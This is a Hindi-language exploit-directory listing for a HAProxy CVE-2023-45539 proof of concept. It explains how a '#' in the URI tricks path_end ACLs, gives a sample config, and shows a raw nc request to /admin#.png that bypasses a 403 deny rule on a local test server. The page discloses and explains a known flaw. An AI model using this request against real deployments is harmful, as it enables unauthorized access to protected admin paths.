Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
HAProxy-CVE-2023-45539-PoC — HAProxy-CVE-2023-45539-PoC | Kitploit
उपकरण/GitHubGitHub/slicingmelon/haproxy-cve-2023-45539-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubslicingmelon/haproxy-cve-2023-45539-poc

HAProxy-CVE-2023-45539-PoC

HAProxy-CVE-2023-45539-PoC

रिपॉजिटरी देखें
91 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HAProxy-CVE-2023-45539-PoC

HAProxy 2.8.2 से पहले, URI घटक के हिस्से के रूप में # को स्वीकार करता है, जो संभावित रूप से दूरस्थ हमलावरों को संवेदनशील जानकारी प्राप्त करने या path_end नियम की गलत व्याख्या के कारण अन्य अनिर्दिष्ट प्रभाव डालने की अनुमति दे सकता है, जैसे कि index.html#.png को स्टैटिक सर्वर पर रूट करना।

इस CVE में गलत रूटिंग वह नहीं है जो बैकएंड ऐप "समर्थन" करता है — यह केवल वे हैं जिन्हें HAProxy स्वयं path_end (या regex) ACLs का उपयोग करके रूट करने के लिए कॉन्फ़िगर किया गया है।

acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static

इसका मतलब है:

HAProxy को इस बात से कोई फर्क नहीं पड़ता कि बैकएंड वास्तव में .png, .js आदि परोस सकता है या नहीं।

यह केवल अनुरोध पथ में प्रत्यय मिलान को देखता है।

यदि प्रत्यय उन स्ट्रिंग्स में से किसी एक से मेल खाता है, तो यह be_static पर रूट हो जाता है।

तो:

/admin#.png → .png से मेल खाता है → be_static पर जाता है → बाईपास

/admin#.asc → मेल नहीं खाता → be_app में रहता है → deny को हिट करता है → 403

curl -i http://localhost:6655/public                                               
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain

APP OK
curl -i http://localhost:6655/admin 
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

बाईपास

printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain

STATIC OK (routed by path_end)
टूल डाउनलोड करें